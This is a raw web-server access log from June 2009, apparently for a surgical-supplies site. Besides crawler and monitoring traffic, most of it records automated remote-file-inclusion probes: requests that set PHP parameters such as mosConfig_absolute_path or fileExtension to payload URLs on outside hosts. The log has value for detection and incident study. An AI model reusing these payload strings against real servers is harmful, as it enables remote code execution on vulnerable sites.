209.172.33.230 - - [19/Jun/2009:02:03:04 -0400] "GET /logs/access_log.Q109051600%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.172.33.230 - - [19/Jun/2009:02:03:04 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 200 6108 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:02:03:07 -0400] "GET /logs/access_log.Q109060800/includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:02:03:07 -0400] "GET /includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:02:03:07 -0400] "GET /logs/access_log.Q109060800/includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:02:03:07 -0400] "GET /logs/includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:02:03:12 -0400] "GET /logs/access_log.Q109060800/includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:02:02:49 -0400] "GET /logs/access_log.Q109061800 HTTP/1.1" 200 4635924 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.98.209.71 - - [19/Jun/2009:02:03:46 -0400] "GET /logs/access_log.Q109050700//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:02:03:47 -0400] "GET /logs/access_log.Q109052000/felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:02:03:56 -0400] "GET /images/index7_hufriedy_sutures.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
124.138.156.3 - - [19/Jun/2009:02:04:02 -0400] "GET /logs/includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
124.138.156.3 - - [19/Jun/2009:02:04:02 -0400] "GET /logs/access_log.Q109050300/includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
124.138.156.3 - - [19/Jun/2009:02:04:07 -0400] "GET /includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
124.138.156.3 - - [19/Jun/2009:02:04:10 -0400] "GET /logs/access_log.Q109060800/includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:02:04:20 -0400] "GET /logs/error_log.Q107051600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
211.49.99.7 - - [19/Jun/2009:02:04:52 -0400] "GET /logs/access_log.Q109052000/felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:02:05:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.49.99.7 - - [19/Jun/2009:02:05:07 -0400] "GET /includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:02:05:09 -0400] "GET /logs/includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:02:05:09 -0400] "GET /logs/error_log.Q109050700%20%20/includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:02:04:50 -0400] "GET /logs/access_log.Q109061700 HTTP/1.1" 200 4385823 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.49.99.7 - - [19/Jun/2009:02:05:29 -0400] "GET /includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:02:05:31 -0400] "GET /logs/error_log.Q109050700%20%20/includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:02:05:31 -0400] "GET /logs/includes/class_item.php?fileExtension=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
195.2.72.39 - - [19/Jun/2009:02:05:46 -0400] "GET /logs/access_log.Q109051600/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hfuknord.de/404.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.63"
195.2.72.39 - - [19/Jun/2009:02:05:46 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hfuknord.de/404.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.63"
195.2.72.39 - - [19/Jun/2009:02:05:50 -0400] "GET /logs/access_log.Q109051600/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.peb.com.ua/ua/ech.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.63"
195.2.72.39 - - [19/Jun/2009:02:05:51 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.peb.com.ua/ua/ech.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.63"
84.201.208.50 - - [19/Jun/2009:02:05:52 -0400] "GET /logs/access_log.Q109050700//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:06:03 -0400] "GET /logs/access_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:02:06:12 -0400] "GET /includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:02:06:12 -0400] "GET /logs/includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:02:06:12 -0400] "GET /logs/access_log.Q109060800%20%20/includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:02:06:40 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0079AD4A86128200333F021+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.98.209.71 - - [19/Jun/2009:02:06:49 -0400] "GET /logs/access_log.Q109051100%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
151.1.154.24 - - [19/Jun/2009:02:07:29 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
151.1.154.24 - - [19/Jun/2009:02:07:29 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
151.1.154.24 - - [19/Jun/2009:02:07:29 -0400] "GET /logs/access_log.Q109050800%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
89.38.128.43 - - [19/Jun/2009:02:07:29 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
89.38.128.43 - - [19/Jun/2009:02:07:30 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 200 6108 "-" "Mozilla/5.0"
89.38.128.43 - - [19/Jun/2009:02:07:30 -0400] "GET /logs/access_log.Q109060900%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.38.128.43 - - [19/Jun/2009:02:07:30 -0400] "GET /logs/access_log.Q109051600%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:02:07:54 -0400] "GET /logs/error_log.Q108051200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
118.129.166.10 - - [19/Jun/2009:02:08:21 -0400] "GET /logs/error_log.Q109050700%20%20/includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:02:08:34 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0079AD4A86B29200323F021+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.189.59.237 - - [19/Jun/2009:02:08:34 -0400] "GET /logs/access_log.Q109052900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
151.1.154.24 - - [19/Jun/2009:02:08:37 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
195.2.72.39 - - [19/Jun/2009:02:10:01 -0400] "GET /logs/access_log.Q109050800/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hfuknord.de/404.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.63"
209.59.12.99 - - [19/Jun/2009:02:10:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.2.72.39 - - [19/Jun/2009:02:10:06 -0400] "GET /logs/access_log.Q109050800/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.peb.com.ua/ua/ech.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.63"
121.189.59.237 - - [19/Jun/2009:02:10:08 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.189.59.237 - - [19/Jun/2009:02:10:09 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.189.59.237 - - [19/Jun/2009:02:10:09 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:02:10:24 -0400] "GET /logs/access_log.Q109051800//appserv/main.php?appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:02:10:28 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0079AD4A86622200333F021+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
118.129.166.10 - - [19/Jun/2009:02:10:37 -0400] "GET /logs/access_log.Q109060100//appserv/main.php?appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:02:10:48 -0400] "GET /includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:02:10:48 -0400] "GET /logs/access_log.Q109050300/includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:02:10:48 -0400] "GET /logs/includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.189.59.237 - - [19/Jun/2009:02:10:49 -0400] "GET /logs/access_log.Q109053000/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:02:10:56 -0400] "GET /logs/error_log.Q108071900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
118.129.166.10 - - [19/Jun/2009:02:11:04 -0400] "GET /logs/access_log.Q109060800/includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:02:11:11 -0400] "GET /logs/includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:02:11:11 -0400] "GET /includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:11:19 -0400] "GET /logs/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:11:19 -0400] "GET /errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:11:20 -0400] "GET /logs/access_log.Q109052000/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:02:11:20 -0400] "GET /logs/access_log.Q109060800/includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:11:24 -0400] "GET /errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:11:24 -0400] "GET /logs/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:11:24 -0400] "GET /logs/access_log.Q109052000/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.16.182.130 - - [19/Jun/2009:02:11:27 -0400] "GET /logs/access_log.Q109050700//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
66.249.71.54 - - [19/Jun/2009:02:11:28 -0400] "GET /images/index4_impltpcsstr.jpg HTTP/1.1" 200 3023 "-" "Googlebot-Image/1.0"
66.249.71.54 - - [19/Jun/2009:02:11:29 -0400] "GET /images/nav_store_hist_grn.jpg HTTP/1.1" 200 1388 "-" "Googlebot-Image/1.0"
190.144.44.36 - - [19/Jun/2009:02:11:52 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
190.144.44.36 - - [19/Jun/2009:02:11:52 -0400] "GET /errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
190.144.44.36 - - [19/Jun/2009:02:11:52 -0400] "GET /logs/errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
190.144.44.36 - - [19/Jun/2009:02:11:53 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
190.144.44.36 - - [19/Jun/2009:02:11:53 -0400] "GET /errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
190.144.44.36 - - [19/Jun/2009:02:11:53 -0400] "GET /logs/errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
83.98.209.71 - - [19/Jun/2009:02:11:57 -0400] "GET /logs/access_log.Q109051000/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.38.128.43 - - [19/Jun/2009:02:11:59 -0400] "GET /logs/access_log.Q109051600/?_SERVER[DOCUMENT_ROOT]=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.144.44.36 - - [19/Jun/2009:02:12:00 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
190.144.44.36 - - [19/Jun/2009:02:12:00 -0400] "GET /errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
190.144.44.36 - - [19/Jun/2009:02:12:00 -0400] "GET /logs/errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
83.98.209.71 - - [19/Jun/2009:02:12:05 -0400] "GET /logs/access_log.Q109051000/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:02:12:06 -0400] "GET /images/over-index7_ethicon_sutures.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
89.38.128.43 - - [19/Jun/2009:02:12:08 -0400] "GET /logs/access_log.Q109060900/?_SERVER[DOCUMENT_ROOT]=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:02:12:12 -0400] "GET /logs/error_log.Q109050700/includes/class_item.php?fileExtension=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
66.249.71.54 - - [19/Jun/2009:02:12:23 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0079AD4A8632A200333F021+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.11.230.36 - - [19/Jun/2009:02:13:18 -0400] "GET /appserv/main.php?appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
66.11.230.36 - - [19/Jun/2009:02:13:22 -0400] "GET /logs/access_log.Q109050900%20%20/appserv/main.php?appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.11.230.36 - - [19/Jun/2009:02:13:22 -0400] "GET /logs/appserv/main.php?appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:02:13:48 -0400] "GET /logs/error_log.Q108031000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
75.125.245.26 - - [19/Jun/2009:02:14:13 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:02:14:13 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:02:14:18 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
66.249.71.54 - - [19/Jun/2009:02:14:19 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0079AD4A86D24200363F021+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [19/Jun/2009:02:15:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.230.22.39 - - [19/Jun/2009:02:15:07 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:02:15:07 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:02:15:07 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
151.1.154.24 - - [19/Jun/2009:02:15:19 -0400] "GET /logs/access_log.Q109051900//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.11.230.36 - - [19/Jun/2009:02:15:24 -0400] "GET /appserv/main.php?appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
151.1.154.24 - - [19/Jun/2009:02:15:28 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:02:15:56 -0400] "GET /logs/error_log.Q108042100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
190.144.44.36 - - [19/Jun/2009:02:16:24 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
190.144.44.36 - - [19/Jun/2009:02:16:25 -0400] "GET /errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
190.144.44.36 - - [19/Jun/2009:02:16:25 -0400] "GET /logs/errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
58.252.80.131 - - [19/Jun/2009:02:16:31 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon)"
58.252.80.131 - - [19/Jun/2009:02:16:31 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon)"
58.252.80.131 - - [19/Jun/2009:02:16:33 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon)"
58.252.80.131 - - [19/Jun/2009:02:16:33 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon)"
123.143.98.5 - - [19/Jun/2009:02:16:50 -0400] "GET /logs/access_log.Q109052200/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:17:05 -0400] "GET /errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:17:05 -0400] "GET /logs/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:17:06 -0400] "GET /logs/error_log.Q109060700/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:17:08 -0400] "GET /logs/access_log.Q109051000/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:17:09 -0400] "GET /logs/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:17:09 -0400] "GET /logs/error_log.Q109060700/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:17:09 -0400] "GET /errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:02:17:11 -0400] "GET /logs/access_log.Q109052200/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:17:11 -0400] "GET /logs/access_log.Q109051000/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:02:17:20 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
190.144.44.36 - - [19/Jun/2009:02:17:23 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
190.144.44.36 - - [19/Jun/2009:02:17:23 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
190.144.44.36 - - [19/Jun/2009:02:17:24 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
83.103.72.130 - - [19/Jun/2009:02:17:45 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:02:17:45 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:02:17:45 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:02:17:52 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:02:17:52 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:02:17:52 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:02:18:00 -0400] "GET /images/_notes/nav_home_temp_over.jpg.mno HTTP/1.0" 200 251 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
